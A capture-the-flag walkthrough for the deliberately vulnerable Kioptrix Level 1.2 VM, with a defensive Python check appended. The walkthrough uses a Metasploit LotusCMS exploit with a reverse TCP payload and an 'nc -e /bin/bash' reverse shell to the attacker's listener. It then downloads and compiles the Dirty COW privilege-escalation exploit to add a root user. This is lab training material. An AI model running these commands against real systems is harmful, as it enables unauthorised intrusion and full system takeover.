# KIOPTRIX: LEVEL 1.2
:::spoiler [Target machine overview](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/)
:::info
**About Release**
Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/?p=358
**Download**
KVM3.rar (Size: 442 MB)
Download: http://www.kioptrix.com/dlvm/KVM3.rar
Download (Mirror): https://download.vulnhub.com/kioptrix/KVM3.rar
**Description**
It's been a while since the last Kioptrix VM challenge. Life keeps getting in the way of these things, you know.
After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.
As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still in the realm of the beginner, I must add. The same as the others, there's more than one way to "pwn" this one. There's easy and not so easy. Remember… the sense of "easy" or "difficult" is always relative to one's own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:
```
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com
```
Under Linux that would be /etc/hosts
There's a web application involved, so to have everything nice and properly displayed you really need to do this.
Hope you enjoy Kioptrix VM Level 1.2 challenge.
452 Megs
MD5 Hash : d324ffadd8e3efc1f96447eec51901f2
Have fun
Source: http://www.kioptrix.com/blog/?p=358
**File Information**
Filename: KVM3.rar
File size: 442 MB
MD5: D324FFADD8E3EFC1F96447EEC51901F2
SHA1: 121348AA8DD5F83640145D4F8E042C8DE0A78F3F
**Virtual Machine**
Format: Virtual Machine (VMware)
Operating System: Linux
**Networking**
DHCP service: Enabled
IP address: Automatically assign
:::
<br>
<br>
**Preparation**
* Import the VM into VMware
* Switch the VM to a different network mode, Bridged ([network](https://blog.csdn.net/Attsky/article/details/109320325), [IP](https://blog.csdn.net/qq1069380146/article/details/111995334))
* [Tutorial video](https://youtu.be/KgG-r32jvDc?si=M1Ho6yPDYaliLqOU)

<br>
<br>
## Step 1: Find the target
Find your own IP with `ifconfig`. Ours is `192.168.0.8`.

Scan for the target's IP: `sudo netdiscover -r 192.168.0.0/24`.

The target is `192.168.0.10`.
Scan its services with nmap: `sudo nmap -A -T4 192.168.0.10`.

HTTP is serving a website: `http://192.168.0.10/`.
`whatweb 192.168.0.10`. Note the `HTTPServer` entry in its output.

On the Blog page we see `http://kioptrix3.com/gallery`.
Basic SQL injection against the Login page does not get us in.

At the very bottom of the login page it says `Proudly Powered by: LotusCMS`.
<br>
<br>
## Step 2: Investigate the service
`searchsploit LotusCMS`.

```
msfconsole -q
search Lotus
search LotusCMS
```

<br>
```
use 0
set payload generic/shell_reverse_tcp
show options
```

<br>
```
set RHOSTS 192.168.0.10
set URI /
exploit
```
`set URI /` sets the module's URI option to `/`. Specifically, it tells the module the URI (Uniform Resource Identifier) of the target, i.e. the path or location on the target the request is sent to. This setting matters.

<br>
Use `id` to check which user you are running as.

<br>
<br>
## Step 3: A different route to privileges
`uname -a` shows the Linux kernel version is `2.6.24`.

`searchsploit Kernel 2.6.24`。

One of the entries is:
`Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c`
"Dirty COW" is a privilege-escalation vulnerability in the Linux kernel; the affected versions are 2.6.22 through 3.9. The exploit uses a race condition involving PTRACE_POKEDATA through which an attacker can modify protected memory and escalate privileges. The attack can target the `/etc/passwd` file, adding a new privileged user to it. System administrators should update the kernel as soon as possible to patch this vulnerability. The listed `40839.c` file is the reference exploit code.
`searchsploit -m linux/local/40839.c`。

`python3 -m http.server`。

<br>
<br>
## Step 4: Establish a connection
The shell we have cannot change directory into /tmp.

Open another shell and start a listener: `sudo nc -nlvp 6666`.
In the original shell, run `nc -e /bin/bash 192.168.0.8 6666` to connect back to that listener.

<br>
```
python -c 'import pty;pty.spawn("/bin/bash")'
```
`python -c`: starts the Python interpreter and runs the given Python code.
`'import pty;pty.spawn("/bin/bash")'`: a short Python script. `import pty` imports the pty module, and `pty.spawn("/bin/bash")` starts an interactive Bash shell. The command uses the pty module to spawn an interactive Bash shell on a Linux system; running it upgrades a non-interactive shell to an interactive one, which makes further work easier. This technique is commonly used in penetration testing and security testing, but should only be used in legitimate, authorised environments.

`wget http://192.168.0.8:8000/40839.c`。

<br>
<br>
## Step 5: The exploit
The file contains its own usage instructions: `cat 40839.c`.

Follow them:
```
gcc -pthread 40839.c -o try -lcrypt
ls -alh
./try
```

<br>
<br>
## Step 6: Gain root
```
su - firefart
# enter the password
id
whoami
```
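As an added example (not part of the original walkthrough), here is a defender-side check for the two things step 3 and step 6 describe: whether a kernel release falls inside the affected range the searchsploit entry lists, and whether `/etc/passwd` has picked up an extra UID-0 account such as the `firefart` user. The sample passwd content, the `alice` account and the function names are constructed for this example.

```python
import re

# Constructed sample (not taken from the VM): a passwd file after an
# "/etc/passwd method" escalation has added a second UID-0 account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
firefart:x:0:0:pwned:/root:/bin/bash
bad line without enough fields
"""

# Affected range exactly as the searchsploit entry above states it: 2.6.22 < 3.9.
AFFECTED_LOW = (2, 6, 22)
AFFECTED_HIGH = (3, 9)  # exclusive upper bound


def kernel_tuple(release):
    """Turn a `uname -r` string such as '2.6.24' or '2.6.32-5-686' into a tuple."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) for x in m.groups(default="0"))


def kernel_in_affected_range(release):
    """True if the release falls in [2.6.22, 3.9)."""
    return AFFECTED_LOW <= kernel_tuple(release) < AFFECTED_HIGH


def find_rogue_superusers(passwd_text, allowed=("root",)):
    """Return (names of UID-0 accounts not in `allowed`, malformed line numbers)."""
    rogue, malformed = [], []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            malformed.append(lineno)  # not a valid passwd entry: worth a look
            continue
        if int(fields[2]) == 0 and fields[0] not in allowed:
            rogue.append(fields[0])
    return rogue, malformed


if __name__ == "__main__":
    print("kernel 2.6.24 in affected range:", kernel_in_affected_range("2.6.24"))
    print("rogue UID-0 users, malformed lines:", find_rogue_superusers(SAMPLE_PASSWD))
```

The version bounds mirror the searchsploit title only; kernels later than 3.9 were also affected by Dirty COW, so on real systems treat the upper bound as the page's wording rather than a patch level.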
